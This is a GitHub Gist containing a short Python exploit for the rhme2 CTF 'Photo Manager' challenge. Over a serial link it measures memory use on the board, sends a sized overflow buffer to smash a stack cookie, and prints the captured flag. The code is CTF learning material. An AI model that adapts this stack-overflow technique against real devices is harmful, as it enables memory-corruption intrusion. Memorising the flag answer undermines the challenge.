Last active
February 17, 2024 18:16
-
-
Save 53845714nF/7ad4c6eb0c38aae9a725e54859f1b8f2 to your computer and use it in GitHub Desktop.
Fast exploit for the rhme2 CTF. For the challenge Photo Manager. Written in Python3. Breaks a a stack cookie.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import serial | |
import time | |
try: | |
arduino = serial.Serial('/dev/ttyUSB0', 19200, timeout=0.1) | |
except: | |
print('Port not found') | |
def read_until(until): | |
arduino_data = '' | |
while until not in arduino_data: | |
arduino_data += str(arduino.readline()) | |
return arduino_data | |
# read the used memory | |
read_until('[2] Memory management') | |
arduino.write(str.encode('2\r')) | |
used_memory = read_until('Memory space used:').split(' ')[7] | |
read_until('[2] Memory management') | |
arduino.write(str.encode('1\r')) | |
read_until('[A-Z/a-z/0-9]') | |
arduino.write(str.encode('A' * (4096 - int(used_memory) - 8) + chr(4088 - int(used_memory)))) | |
arduino.write(b"\xff") | |
arduino.write(str.encode('\r')) | |
print(read_until('[2] Memory management')) | |
# Flage shows with the keyword: FLAG | |
# In my case: FLAG:D1d_y0u_sm4sh_my_stack_bro? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment